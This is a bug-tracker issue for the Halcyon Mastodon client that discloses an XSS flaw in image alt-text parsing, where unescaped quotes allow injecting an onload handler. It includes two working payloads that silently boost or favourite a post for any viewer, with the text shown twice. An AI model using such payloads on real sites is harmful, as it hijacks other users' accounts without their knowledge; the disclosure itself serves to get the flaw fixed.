Home Explore Help
Register Sign In
halcyon-suite
/
halcyon
Watch 8
Star 23
Fork 16
Files Issues 17 Pull Requests 0 Wiki
Labels Milestones
New Issue

#125 XSS vulnerability: Alt Text

Open
opened 1 month ago by TheDarkBomber · 0 comments
Caesar commented 1 month ago

The parser for alt text (or, title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the img element I want, such as class and onload, where I can place arbitrary JS.

Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack.

Here's an example of the alt text that one can specify for an image that will create a self-boosting post.

this is an image of some kind "class="xss" onload="let reboostBtnXSS = $('.xss').parents('.toot_content').find('.boost_button'); if (reboostBtnXSS.attr('reblogged') == 'false') reboostBtnXSS.click(); alert('XSS in Halcyon')"

If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text, they would find that they have boosted it without their knowledge.

Here's the version for a self-favouriting post, which I have tested privately.

this is an image of some kind "class="xss" onload="let favBtnXSS = $('.xss').parents('.toot_content').find('.fav_button'); if (favBtnXSS.attr('favourited') == 'false') favBtnXSS.click(); alert('self-favourited post')"

I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.

The parser for alt text (or, title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the `img` element I want, such as `class` and `onload`, where I can place arbitrary JS. Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack. Here's an example of the alt text that one can specify for an image that will create a self-boosting post. ``` this is an image of some kind "class="xss" onload="let reboostBtnXSS = $('.xss').parents('.toot_content').find('.boost_button'); if (reboostBtnXSS.attr('reblogged') == 'false') reboostBtnXSS.click(); alert('XSS in Halcyon')" ``` If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text, they would find that they have boosted it without their knowledge. Here's the version for a self-favouriting post, which I have tested privately. ``` this is an image of some kind "class="xss" onload="let favBtnXSS = $('.xss').parents('.toot_content').find('.fav_button'); if (favBtnXSS.attr('favourited') == 'false') favBtnXSS.click(); alert('self-favourited post')" ``` I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.
Sign in to join this conversation.
Labels
Clear labels
bug duplicate enhancement help wanted instance invalid question wontfix
No Label
bug
duplicate
enhancement
help wanted
instance
invalid
question
wontfix
Milestone
Clear milestone
No Milestone
Assignee
Clear assignee
No assignee
1 Participants
Write Preview
Loading...
Cancel
Save
There is no content yet.